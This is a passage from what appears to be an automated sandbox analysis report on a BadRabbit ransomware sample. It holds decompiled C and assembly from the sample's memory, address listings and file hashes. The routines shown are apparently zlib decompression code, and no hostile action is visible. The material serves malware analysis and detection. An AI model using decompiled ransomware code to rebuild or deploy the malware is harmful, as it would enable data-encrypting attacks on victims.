                                                                                                                                                  									_t406 = _t405 + 3;
                                                                                                                                                  									 *((char*)(_t363 + 1)) =  *((intOrPtr*)(_t405 + 1));
                                                                                                                                                  									 *((char*)(_t363 + 2)) =  *((intOrPtr*)(_t405 + 2));
                                                                                                                                                  									_t170 = memcpy(_t363 + 3, _t406, _t298);
                                                                                                                                                  									_t426 =  &(_t426[3]);
                                                                                                                                                  									_t363 = _t406 + _t298 + _t298;
                                                                                                                                                  									_t390 = _t426[0xb];
                                                                                                                                                  									_t250 = _t426[2];
                                                                                                                                                  									goto L64;
                                                                                                                                                  								} else {
                                                                                                                                                  									_t374 = _t363 - 1;
                                                                                                                                                  									_t192 =  *_t374;
                                                                                                                                                  									_t301 = _t345 - 3;
                                                                                                                                                  									 *(_t374 + 1) = _t192;
                                                                                                                                                  									 *(_t374 + 2) = _t192;
                                                                                                                                                  									 *(_t374 + 3) = _t192;
                                                                                                                                                  									_t375 = _t374 + 4;
                                                                                                                                                  									_t170 = memset(_t375, _t192, _t301 << 0);
                                                                                                                                                  									_t426 =  &(_t426[3]);
                                                                                                                                                  									_t363 = _t375 + _t301;
                                                                                                                                                  									_t250 = _t426[2];
                                                                                                                                                  									L64:
                                                                                                                                                  									if(_t426[4] <= _t363) {
                                                                                                                                                  										goto L104;
                                                                                                                                                  									}
                                                                                                                                                  									goto L65;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							asm("psrlq mm0, mm1");
                                                                                                                                                  							asm("movd mm1, eax");
                                                                                                                                                  							asm("movd ecx, mm0");
                                                                                                                                                  							_t423 = _t423 - _t180;
                                                                                                                                                  							_t250 = _t250 + (_t283 &  *(0xd37bc + _t180 * 4));
                                                                                                                                                  							goto L76;
                                                                                                                                                  						}
                                                                                                                                                  						_t170 = _t171 >> 0x10;
                                                                                                                                                  						asm("stosb");
                                                                                                                                                  						goto L64;
                                                                                                                                                  						L65:
                                                                                                                                                  					} while (_t426[5] > _t390);
                                                                                                                                                  					goto L104;
                                                                                                                                                  				}
                                                                                                                                                  			}




























































































                                                                                                                                                  0x000d3844
                                                                                                                                                  0x000d3845
                                                                                                                                                  0x000d3848
                                                                                                                                                  0x000d3849
                                                                                                                                                  0x000d384d
                                                                                                                                                  0x000d3853
                                                                                                                                                  0x000d385a
                                                                                                                                                  0x000d385e
                                                                                                                                                  0x000d3866
                                                                                                                                                  0x000d3869
                                                                                                                                                  0x000d387a
                                                                                                                                                  0x000d387e
                                                                                                                                                  0x000d3882
                                                                                                                                                  0x000d388c
                                                                                                                                                  0x000d3890
                                                                                                                                                  0x000d389f
                                                                                                                                                  0x000d38ad
                                                                                                                                                  0x000d38b1
                                                                                                                                                  0x000d38b7
                                                                                                                                                  0x000d38ba
                                                                                                                                                  0x000d38be
                                                                                                                                                  0x000d38c2
                                                                                                                                                  0x000d38c6
                                                                                                                                                  0x000d38c9
                                                                                                                                                  0x000d38cc
                                                                                                                                                  0x000d38d0
                                                                                                                                                  0x000d38d6
                                                                                                                                                  0x000d38fa
                                                                                                                                                  0x000d3900
                                                                                                                                                  0x000d3906
                                                                                                                                                  0x000d3907
                                                                                                                                                  0x000d3909
                                                                                                                                                  0x000d390c
                                                                                                                                                  0x000d390e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d390e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d38d8
                                                                                                                                                  0x000d38db
                                                                                                                                                  0x000d38ee
                                                                                                                                                  0x000d38ee
                                                                                                                                                  0x000d38ee
                                                                                                                                                  0x000d38f0
                                                                                                                                                  0x000d38f4
                                                                                                                                                  0x000d3912
                                                                                                                                                  0x000d3912
                                                                                                                                                  0x000d3916
                                                                                                                                                  0x000d3916
                                                                                                                                                  0x000d391d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3923
                                                                                                                                                  0x000d3990
                                                                                                                                                  0x000d3993
                                                                                                                                                  0x000d3997
                                                                                                                                                  0x000d3999
                                                                                                                                                  0x000d399b
                                                                                                                                                  0x000d39a0
                                                                                                                                                  0x000d39a0
                                                                                                                                                  0x000d39ab
                                                                                                                                                  0x000d39ae
                                                                                                                                                  0x000d39b0
                                                                                                                                                  0x000d39b2
                                                                                                                                                  0x000d39b6
                                                                                                                                                  0x000d39bb
                                                                                                                                                  0x000d39bb
                                                                                                                                                  0x000d39bb
                                                                                                                                                  0x000d39d3
                                                                                                                                                  0x000d39d6
                                                                                                                                                  0x000d39da
                                                                                                                                                  0x000d3ad6
                                                                                                                                                  0x000d3dea
                                                                                                                                                  0x000d3dec
                                                                                                                                                  0x000d3dfa
                                                                                                                                                  0x000d3dff
                                                                                                                                                  0x000d3dee
                                                                                                                                                  0x000d3dee
                                                                                                                                                  0x000d3df3
                                                                                                                                                  0x000d3df3
                                                                                                                                                  0x000d3e16
                                                                                                                                                  0x000d3e16
                                                                                                                                                  0x000d3e1c
                                                                                                                                                  0x000d3e1e
                                                                                                                                                  0x000d3e1e
                                                                                                                                                  0x000d3e24
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3e24
                                                                                                                                                  0x000d3aec
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3aec
                                                                                                                                                  0x000d39e0
                                                                                                                                                  0x000d39e3
                                                                                                                                                  0x000d39e7
                                                                                                                                                  0x000d39ed
                                                                                                                                                  0x000d39ef
                                                                                                                                                  0x000d39f1
                                                                                                                                                  0x000d39f6
                                                                                                                                                  0x000d39f8
                                                                                                                                                  0x000d39f8
                                                                                                                                                  0x000d3a02
                                                                                                                                                  0x000d3a04
                                                                                                                                                  0x000d3a06
                                                                                                                                                  0x000d3a08
                                                                                                                                                  0x000d3a08
                                                                                                                                                  0x000d3a0a
                                                                                                                                                  0x000d3a11
                                                                                                                                                  0x000d3a15
                                                                                                                                                  0x000d3a17
                                                                                                                                                  0x000d3a19
                                                                                                                                                  0x000d3a1e
                                                                                                                                                  0x000d3a1e
                                                                                                                                                  0x000d3a2a
                                                                                                                                                  0x000d3a2d
                                                                                                                                                  0x000d3a2f
                                                                                                                                                  0x000d3a34
                                                                                                                                                  0x000d3a36
                                                                                                                                                  0x000d3a38
                                                                                                                                                  0x000d3a3c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3af6
                                                                                                                                                  0x000d3dde
                                                                                                                                                  0x000d3dde
                                                                                                                                                  0x000d3de3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3de3
                                                                                                                                                  0x000d3b0c
                                                                                                                                                  0x000d3b0c
                                                                                                                                                  0x000d3a42
                                                                                                                                                  0x000d3a45
                                                                                                                                                  0x000d3aaf
                                                                                                                                                  0x000d3a6e
                                                                                                                                                  0x000d3a6e
                                                                                                                                                  0x000d3a74
                                                                                                                                                  0x000d3a7a
                                                                                                                                                  0x000d3b16
                                                                                                                                                  0x000d3b1a
                                                                                                                                                  0x000d3b1c
                                                                                                                                                  0x000d3b22
                                                                                                                                                  0x000d3e06
                                                                                                                                                  0x000d3e06
                                                                                                                                                  0x000d3e0a
                                                                                                                                                  0x000d3e0f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3e0f
                                                                                                                                                  0x000d3b28
                                                                                                                                                  0x000d3b2f
                                                                                                                                                  0x000d3b55
                                                                                                                                                  0x000d3b5b
                                                                                                                                                  0x000d3b8b
                                                                                                                                                  0x000d3b8d
                                                                                                                                                  0x000d3b93
                                                                                                                                                  0x000d3b97
                                                                                                                                                  0x000d3b97
                                                                                                                                                  0x000d3b97
                                                                                                                                                  0x000d3b9b
                                                                                                                                                  0x000d3b9b
                                                                                                                                                  0x000d3b5d
                                                                                                                                                  0x000d3b63
                                                                                                                                                  0x000d3b65
                                                                                                                                                  0x000d3b67
                                                                                                                                                  0x000d3b6d
                                                                                                                                                  0x000d3b71
                                                                                                                                                  0x000d3b71
                                                                                                                                                  0x000d3b71
                                                                                                                                                  0x000d3b73
                                                                                                                                                  0x000d3b77
                                                                                                                                                  0x000d3b7d
                                                                                                                                                  0x000d3b81
                                                                                                                                                  0x000d3b81
                                                                                                                                                  0x000d3b81
                                                                                                                                                  0x000d3b85
                                                                                                                                                  0x000d3b85
                                                                                                                                                  0x000d3b7d
                                                                                                                                                  0x000d3b6d
                                                                                                                                                  0x000d3b31
                                                                                                                                                  0x000d3b33
                                                                                                                                                  0x000d3b35
                                                                                                                                                  0x000d3b3b
                                                                                                                                                  0x000d3b3f
                                                                                                                                                  0x000d3b3f
                                                                                                                                                  0x000d3b3f
                                                                                                                                                  0x000d3b43
                                                                                                                                                  0x000d3b43
                                                                                                                                                  0x000d3b3b
                                                                                                                                                  0x000d3b9d
                                                                                                                                                  0x000d3b9f
                                                                                                                                                  0x000d3b9f
                                                                                                                                                  0x000d3b9f
                                                                                                                                                  0x000d3ba1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3ba1
                                                                                                                                                  0x000d3a86
                                                                                                                                                  0x000d3a88
                                                                                                                                                  0x000d3a8d
                                                                                                                                                  0x000d3a95
                                                                                                                                                  0x000d3a98
                                                                                                                                                  0x000d3a9b
                                                                                                                                                  0x000d3aa1
                                                                                                                                                  0x000d3aa1
                                                                                                                                                  0x000d3aa1
                                                                                                                                                  0x000d3aa3
                                                                                                                                                  0x000d3ab7
                                                                                                                                                  0x000d3ab7
                                                                                                                                                  0x000d3abc
                                                                                                                                                  0x000d3abe
                                                                                                                                                  0x000d3ac1
                                                                                                                                                  0x000d3ac4
                                                                                                                                                  0x000d3ac7
                                                                                                                                                  0x000d3aca
                                                                                                                                                  0x000d3acd
                                                                                                                                                  0x000d3acd
                                                                                                                                                  0x000d3acd
                                                                                                                                                  0x000d3acd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3aaf
                                                                                                                                                  0x000d3a49
                                                                                                                                                  0x000d3a4f
                                                                                                                                                  0x000d3a51
                                                                                                                                                  0x000d3a53
                                                                                                                                                  0x000d3a58
                                                                                                                                                  0x000d3a5a
                                                                                                                                                  0x000d3a5a
                                                                                                                                                  0x000d3a64
                                                                                                                                                  0x000d3a66
                                                                                                                                                  0x000d3a68
                                                                                                                                                  0x000d3a6a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3a6a
                                                                                                                                                  0x000d39bc
                                                                                                                                                  0x000d39bc
                                                                                                                                                  0x000d3e28
                                                                                                                                                  0x000d3e2f
                                                                                                                                                  0x000d3e31
                                                                                                                                                  0x000d3e31
                                                                                                                                                  0x000d3e33
                                                                                                                                                  0x000d3e39
                                                                                                                                                  0x000d3e3c
                                                                                                                                                  0x000d3e3f
                                                                                                                                                  0x000d3e44
                                                                                                                                                  0x000d3e46
                                                                                                                                                  0x000d3e49
                                                                                                                                                  0x000d3e4c
                                                                                                                                                  0x000d3e4e
                                                                                                                                                  0x000d3e56
                                                                                                                                                  0x000d3e5a
                                                                                                                                                  0x000d3e5c
                                                                                                                                                  0x000d3e60
                                                                                                                                                  0x000d3e68
                                                                                                                                                  0x000d3e68
                                                                                                                                                  0x000d3e6c
                                                                                                                                                  0x000d3e75
                                                                                                                                                  0x000d3e7d
                                                                                                                                                  0x000d3e7f
                                                                                                                                                  0x000d3e82
                                                                                                                                                  0x000d3e85
                                                                                                                                                  0x000d3e85
                                                                                                                                                  0x000d3e89
                                                                                                                                                  0x000d3e8c
                                                                                                                                                  0x000d3e92
                                                                                                                                                  0x000d3ea5
                                                                                                                                                  0x000d3e94
                                                                                                                                                  0x000d3e99
                                                                                                                                                  0x000d3e99
                                                                                                                                                  0x000d3ea8
                                                                                                                                                  0x000d3eae
                                                                                                                                                  0x000d3ec7
                                                                                                                                                  0x000d3eb0
                                                                                                                                                  0x000d3eb8
                                                                                                                                                  0x000d3eb8
                                                                                                                                                  0x000d3ecd
                                                                                                                                                  0x000d3ed2
                                                                                                                                                  0x000d3ed2
                                                                                                                                                  0x000d3925
                                                                                                                                                  0x000d3926
                                                                                                                                                  0x000d3927
                                                                                                                                                  0x000d3928
                                                                                                                                                  0x000d3929
                                                                                                                                                  0x000d392d
                                                                                                                                                  0x000d3934
                                                                                                                                                  0x000d3935
                                                                                                                                                  0x000d3936
                                                                                                                                                  0x000d3937
                                                                                                                                                  0x000d3939
                                                                                                                                                  0x000d397f
                                                                                                                                                  0x000d397f
                                                                                                                                                  0x000d3989
                                                                                                                                                  0x000d3989
                                                                                                                                                  0x000d398a
                                                                                                                                                  0x000d398b
                                                                                                                                                  0x000d398c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d398c
                                                                                                                                                  0x000d393d
                                                                                                                                                  0x000d3945
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3957
                                                                                                                                                  0x000d395c
                                                                                                                                                  0x000d3967
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3973
                                                                                                                                                  0x000d3973
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3973
                                                                                                                                                  0x000d3967
                                                                                                                                                  0x000d3945
                                                                                                                                                  0x000d3bac
                                                                                                                                                  0x000d3bae
                                                                                                                                                  0x000d3bb1
                                                                                                                                                  0x000d3bb3
                                                                                                                                                  0x000d3bb7
                                                                                                                                                  0x000d3bba
                                                                                                                                                  0x000d3bbf
                                                                                                                                                  0x000d3bc2
                                                                                                                                                  0x000d3bc5
                                                                                                                                                  0x000d3bcc
                                                                                                                                                  0x000d3bcc
                                                                                                                                                  0x000d3bd2
                                                                                                                                                  0x000d3bd4
                                                                                                                                                  0x000d3bd7
                                                                                                                                                  0x000d3bda
                                                                                                                                                  0x000d3bdd
                                                                                                                                                  0x000d3be0
                                                                                                                                                  0x000d3be3
                                                                                                                                                  0x000d3be3
                                                                                                                                                  0x000d3be6
                                                                                                                                                  0x000d3be9
                                                                                                                                                  0x000d3bec
                                                                                                                                                  0x000d3bef
                                                                                                                                                  0x000d3bf2
                                                                                                                                                  0x000d3bf2
                                                                                                                                                  0x000d3bf5
                                                                                                                                                  0x000d3bf8
                                                                                                                                                  0x000d3bfc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3c19
                                                                                                                                                  0x000d3c1e
                                                                                                                                                  0x000d3d06
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3d0f
                                                                                                                                                  0x000d3d12
                                                                                                                                                  0x000d3d1e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3d1e
                                                                                                                                                  0x000d3c24
                                                                                                                                                  0x000d3c27
                                                                                                                                                  0x000d3c29
                                                                                                                                                  0x000d3c2c
                                                                                                                                                  0x000d3c2f
                                                                                                                                                  0x000d3c32
                                                                                                                                                  0x000d3c3b
                                                                                                                                                  0x000d3c3b
                                                                                                                                                  0x000d3c3d
                                                                                                                                                  0x000d3c43
                                                                                                                                                  0x000d3c45
                                                                                                                                                  0x000d3c48
                                                                                                                                                  0x000d3c4b
                                                                                                                                                  0x000d3c4e
                                                                                                                                                  0x000d3c51
                                                                                                                                                  0x000d3c54
                                                                                                                                                  0x000d3c54
                                                                                                                                                  0x000d3c5b
                                                                                                                                                  0x000d3c5e
                                                                                                                                                  0x000d3c61
                                                                                                                                                  0x000d3c64
                                                                                                                                                  0x000d3c67
                                                                                                                                                  0x000d3c67
                                                                                                                                                  0x000d3c6c
                                                                                                                                                  0x000d3c6f
                                                                                                                                                  0x000d3c71
                                                                                                                                                  0x000d3c76
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3d2a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3d33
                                                                                                                                                  0x000d3d36
                                                                                                                                                  0x000d3d46
                                                                                                                                                  0x000d3d46
                                                                                                                                                  0x000d3c7c
                                                                                                                                                  0x000d3c7f
                                                                                                                                                  0x000d3cdb
                                                                                                                                                  0x000d3c95
                                                                                                                                                  0x000d3c95
                                                                                                                                                  0x000d3c9b
                                                                                                                                                  0x000d3ca1
                                                                                                                                                  0x000d3d52
                                                                                                                                                  0x000d3d56
                                                                                                                                                  0x000d3d58
                                                                                                                                                  0x000d3d5e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3d64
                                                                                                                                                  0x000d3d6b
                                                                                                                                                  0x000d3d8d
                                                                                                                                                  0x000d3d93
                                                                                                                                                  0x000d3dbf
                                                                                                                                                  0x000d3dc3
                                                                                                                                                  0x000d3dc5
                                                                                                                                                  0x000d3dc7
                                                                                                                                                  0x000d3dc7
                                                                                                                                                  0x000d3dc7
                                                                                                                                                  0x000d3dcb
                                                                                                                                                  0x000d3dcb
                                                                                                                                                  0x000d3d95
                                                                                                                                                  0x000d3d9b
                                                                                                                                                  0x000d3d9d
                                                                                                                                                  0x000d3da1
                                                                                                                                                  0x000d3da3
                                                                                                                                                  0x000d3da5
                                                                                                                                                  0x000d3da5
                                                                                                                                                  0x000d3da5
                                                                                                                                                  0x000d3da7
                                                                                                                                                  0x000d3dab
                                                                                                                                                  0x000d3db1
                                                                                                                                                  0x000d3db3
                                                                                                                                                  0x000d3db5
                                                                                                                                                  0x000d3db5
                                                                                                                                                  0x000d3db5
                                                                                                                                                  0x000d3db9
                                                                                                                                                  0x000d3db9
                                                                                                                                                  0x000d3db1
                                                                                                                                                  0x000d3da1
                                                                                                                                                  0x000d3d6d
                                                                                                                                                  0x000d3d6f
                                                                                                                                                  0x000d3d73
                                                                                                                                                  0x000d3d75
                                                                                                                                                  0x000d3d77
                                                                                                                                                  0x000d3d77
                                                                                                                                                  0x000d3d77
                                                                                                                                                  0x000d3d7b
                                                                                                                                                  0x000d3d7b
                                                                                                                                                  0x000d3d73
                                                                                                                                                  0x000d3dcd
                                                                                                                                                  0x000d3dcf
                                                                                                                                                  0x000d3dcf
                                                                                                                                                  0x000d3dcf
                                                                                                                                                  0x000d3dd1
                                                                                                                                                  0x000d3dd5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3dd5
                                                                                                                                                  0x000d3cab
                                                                                                                                                  0x000d3cad
                                                                                                                                                  0x000d3cb2
                                                                                                                                                  0x000d3cba
                                                                                                                                                  0x000d3cbd
                                                                                                                                                  0x000d3cc0
                                                                                                                                                  0x000d3cc6
                                                                                                                                                  0x000d3cc6
                                                                                                                                                  0x000d3cc6
                                                                                                                                                  0x000d3cc8
                                                                                                                                                  0x000d3ccc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3ce3
                                                                                                                                                  0x000d3ce3
                                                                                                                                                  0x000d3ce6
                                                                                                                                                  0x000d3ce8
                                                                                                                                                  0x000d3ceb
                                                                                                                                                  0x000d3cee
                                                                                                                                                  0x000d3cf1
                                                                                                                                                  0x000d3cf4
                                                                                                                                                  0x000d3cf7
                                                                                                                                                  0x000d3cf7
                                                                                                                                                  0x000d3cf7
                                                                                                                                                  0x000d3cf9
                                                                                                                                                  0x000d3c02
                                                                                                                                                  0x000d3c06
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3c06
                                                                                                                                                  0x000d3cdb
                                                                                                                                                  0x000d3c81
                                                                                                                                                  0x000d3c84
                                                                                                                                                  0x000d3c87
                                                                                                                                                  0x000d3c8a
                                                                                                                                                  0x000d3c93
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3c93
                                                                                                                                                  0x000d3bfe
                                                                                                                                                  0x000d3c01
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3c0c
                                                                                                                                                  0x000d3c0c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x000d3c12

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000009.00000002.303040427.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                  • Associated: 00000009.00000002.303032103.00000000000D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303059119.00000000000D4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 00000009.00000002.303073243.00000000000D9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_9_2_d0000_Endermanch@BadRabbit.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                                                                                                                                  • API String ID: 0-3089872807
                                                                                                                                                  • Opcode ID: 49a16adbf722bc35dcf5d0f2f799391a7bd6abd5076b1976b738bb81182a5985
                                                                                                                                                  • Instruction ID: 8f7e2575988764b8e39420cbdc0b75cefbd22a80cc4c45c32c2e887de1aa1cbd
                                                                                                                                                  • Opcode Fuzzy Hash: 49a16adbf722bc35dcf5d0f2f799391a7bd6abd5076b1976b738bb81182a5985
                                                                                                                                                  • Instruction Fuzzy Hash: DD122732A083418FD764DE3CC59422AFBE1AB88350F14862EE895D7B40D375DE48CBA3
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                                  			E000D173C(signed int _a4, intOrPtr _a8) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				int _v20;
                                                                                                                                                  				signed char _v21;
                                                                                                                                                  				signed char _v22;
                                                                                                                                                  				signed char _v23;
                                                                                                                                                  				signed char _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				void* _v32;
                                                                                                                                                  				signed int _v36;
                                                                                                                                                  				unsigned int _v40;
                                                                                                                                                  				int _v44;
                                                                                                                                                  				signed int _v48;
                                                                                                                                                  				signed int _v52;
                                                                                                                                                  				signed int _v54;
                                                                                                                                                  				signed int _v56;
                                                                                                                                                  				signed int _v60;
                                                                                                                                                  				signed int _v2097152004;
                                                                                                                                                  				void* _t774;
                                                                                                                                                  				signed int _t776;
                                                                                                                                                  				signed int* _t815;
                                                                                                                                                  				signed int _t819;
                                                                                                                                                  				signed int _t834;
                                                                                                                                                  				signed int _t844;
                                                                                                                                                  				intOrPtr* _t847;
                                                                                                                                                  				signed int _t849;
                                                                                                                                                  
                                                                                                                                                  				_t847 = _a4;
                                                                                                                                                  				if(_t847 == 0) {
                                                                                                                                                  					L144:
                                                                                                                                                  					_push(0xfffffffe);
                                                                                                                                                  					L145:
                                                                                                                                                  					_pop(_t774);
                                                                                                                                                  					return _t774;
                                                                                                                                                  				}
                                                                                                                                                  				_t815 =  *(_t847 + 0x1c);
                                                                                                                                                  				_v40 = _t815;
                                                                                                                                                  				if(_t815 != 0 &&  *((intOrPtr*)(_t847 + 0xc)) != 0 && ( *_t847 != 0 ||  *(_t847 + 4) == 0)) {
                                                                                                                                                  					if( *_t815 == 0xb) {
                                                                                                                                                  						 *_t815 = 0xc;
                                                                                                                                                  					}
                                                                                                                                                  					_t834 = _t815[0xe];
                                                                                                                                                  					_t844 = _t815[0xf];
                                                                                                                                                  					_v32 =  *((intOrPtr*)(_t847 + 0xc));
                                                                                                                                                  					_v28 =  *((intOrPtr*)(_t847 + 0x10));
                                                                                                                                                  					_v12 =  *_t847;
                                                                                                                                                  					_t819 =  *(_t847 + 4);
                                                                                                                                                  					_v36 = 0;
                                                                                                                                                  					_t776 =  *_t815;
                                                                                                                                                  					_v8 = _t819;
                                                                                                                                                  					_v16 = _t834;
                                                                                                                                                  					_v20 = _t844;
                                                                                                                                                  					_v60 = _t819;
                                                                                                                                                  					_v44 = _v28;
                                                                                                                                                  					if(_t776 <= 0x1e) {
                                                                                                                                                  						_t849 = _a4;
                                                                                                                                                  						do {
                                                                                                                                                  							switch( *((intOrPtr*)(_t776 * 4 +  &M000D2B54))) {
                                                                                                                                                  								case 0:
                                                                                                                                                  									if(_t815[2] != 0) {
                                                                                                                                                  										_push(0x10);
                                                                                                                                                  										_pop(_t777);
                                                                                                                                                  										__eflags = _t844 - _t777;
                                                                                                                                                  										if(_t844 >= _t777) {
                                                                                                                                                  											L16:
                                                                                                                                                  											__eflags = _t815[2] & 0x00000002;
                                                                                                                                                  											if((_t815[2] & 0x00000002) == 0) {
                                                                                                                                                  												L19:
                                                                                                                                                  												_t815[4] = _t815[4] & 0x00000000;
                                                                                                                                                  												_t778 = _t815[8];
                                                                                                                                                  												__eflags = _t778;
                                                                                                                                                  												if(_t778 != 0) {
                                                                                                                                                  													_t46 = _t778 + 0x30;
                                                                                                                                                  													 *_t46 =  *(_t778 + 0x30) | 0xffffffff;
                                                                                                                                                  													__eflags =  *_t46;
                                                                                                                                                  												}
                                                                                                                                                  												__eflags = _t815[2] & 0x00000001;
                                                                                                                                                  												if((_t815[2] & 0x00000001) == 0) {
                                                                                                                                                  													L32:
                                                                                                                                                  													 *(_t849 + 0x18) = "incorrect header check";
                                                                                                                                                  													goto L25;
                                                                                                                                                  												}
                                                                                                                                                  												_t781 = (_t834 >> 8) + ((_t834 & 0x000000ff) << 8);
                                                                                                                                                  												_push(0x1f);
                                                                                                                                                  												_pop(_t822);
                                                                                                                                                  												__eflags = _t781 % _t822;
                                                                                                                                                  												_t834 = _v16;
                                                                                                                                                  												if(_t781 % _t822 != 0) {
                                                                                                                                                  													goto L32;
                                                                                                                                                  												}
                                                                                                                                                  												__eflags = (_t834 & 0x0000000f) - 8;
                                                                                                                                                  												if((_t834 & 0x0000000f) == 8) {
                                                                                                                                                  													_t834 = _t834 >> 4;
                                                                                                                                                  													_t844 = _t844 - 4;
                                                                                                                                                  													_v16 = _t834;
                                                                                                                                                  													_v20 = _t844;
                                                                                                                                                  													_t825 = (_t834 & 0x0000000f) + 8;
                                                                                                                                                  													__eflags = _t815[9];
                                                                                                                                                  													if(_t815[9] != 0) {
                                                                                                                                                  														__eflags = _t825 - _t815[9];
                                                                                                                                                  														if(_t825 <= _t815[9]) {
                                                                                                                                                  															goto L28;
                                                                                                                                                  														}
                                                                                                                                                  														 *(_t849 + 0x18) = "invalid window size";
                                                                                                                                                  														goto L25;
                                                                                                                                                  													} else {
                                                                                                                                                  														_t815[9] = _t825;
                                                                                                                                                  														L28:
                                                                                                                                                  														_t844 = 0;
                                                                                                                                                  														_t815[5] = 1 << _t825;
                                                                                                                                                  														_t788 = E000D2E91(0, 0, 0);
                                                                                                                                                  														_t815[6] = _t788;
                                                                                                                                                  														 *(_t849 + 0x30) = _t788;
                                                                                                                                                  														_t843 =  !(_v16 >> 8) & 0x00000002 | 0x00000009;
                                                                                                                                                  														__eflags = _t843;
                                                                                                                                                  														 *_t815 = _t843;
                                                                                                                                                  														_t834 = 0;
                                                                                                                                                  														goto L29;
                                                                                                                                                  													}
                                                                                                                                                  												} else {
                                                                                                                                                  													 *(_t849 + 0x18) = "unknown compression method";
                                                                                                                                                  													goto L25;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  											__eflags = _t834 - 0x8b1f;
                                                                                                                                                  											if(_t834 != 0x8b1f) {
                                                                                                                                                  												goto L19;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t844 = 0;
                                                                                                                                                  												_t815[6] = E000D30C1(0, 0, 0);
                                                                                                                                                  												_push(0x1f);
                                                                                                                                                  												_pop(_t790);
                                                                                                                                                  												_v24 = _t790;
                                                                                                                                                  												_v23 = 0x8b;
                                                                                                                                                  												_t792 = E000D30C1(_t815[6],  &_v24, 2);
                                                                                                                                                  												_t834 = 0;
                                                                                                                                                  												_t815[6] = _t792;
                                                                                                                                                  												_v16 = 0;
                                                                                                                                                  												_v20 = 0;
                                                                                                                                                  												 *_t815 = 1;
                                                                                                                                                  												goto L142;
                                                                                                                                                  											}
                                                                                                                                                  										} else {
                                                                                                                                                  											_t793 = _v12;
                                                                                                                                                  											while(1) {
                                                                                                                                                  												__eflags = _t819;
                                                                                                                                                  												if(_t819 == 0) {
                                                                                                                                                  													goto L331;
                                                                                                                                                  												}
                                                                                                                                                  												_v8 = _t819 - 1;
                                                                                                                                                  												_t813 = ( *_t793 & 0x000000ff) << _t844;
                                                                                                                                                  												_t844 = _t844 + 8;
                                                                                                                                                  												_t819 = _v8;
                                                                                                                                                  												_t834 = _t834 + _t813;
                                                                                                                                                  												_t793 = _v12 + 1;
                                                                                                                                                  												_v16 = _t834;
                                                                                                                                                  												_v12 = _t793;
                                                                                                                                                  												_v20 = _t844;
                                                                                                                                                  												__eflags = _t844 - 0x10;
                                                                                                                                                  												if(_t844 < 0x10) {
                                                                                                                                                  													continue;
                                                                                                                                                  												}
                                                                                                                                                  												goto L16;
                                                                                                                                                  											}
                                                                                                                                                  											goto L331;
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										 *_t815 = 0xc;
                                                                                                                                                  										goto L143;
                                                                                                                                                  									}
                                                                                                                                                  								case 1:
                                                                                                                                                  									_push(0x10);
                                                                                                                                                  									_pop(__eax);
                                                                                                                                                  									__eflags = __edi - __eax;
                                                                                                                                                  									if(__edi >= __eax) {
                                                                                                                                                  										L37:
                                                                                                                                                  										 *(__ebx + 0x10) = __edx;
                                                                                                                                                  										__eflags = __dl - 8;
                                                                                                                                                  										if(__dl == 8) {
                                                                                                                                                  											__eflags = __edx & 0x0000e000;
                                                                                                                                                  											if((__edx & 0x0000e000) == 0) {
                                                                                                                                                  												__ecx =  *(__ebx + 0x20);
                                                                                                                                                  												__eflags = __ecx;
                                                                                                                                                  												if(__ecx != 0) {
                                                                                                                                                  													__edx = __edx >> 8;
                                                                                                                                                  													__eax = __edx >> 0x00000008 & 0x00000001;
                                                                                                                                                  													__eflags = __eax;
                                                                                                                                                  													 *__ecx = __eax;
                                                                                                                                                  												}
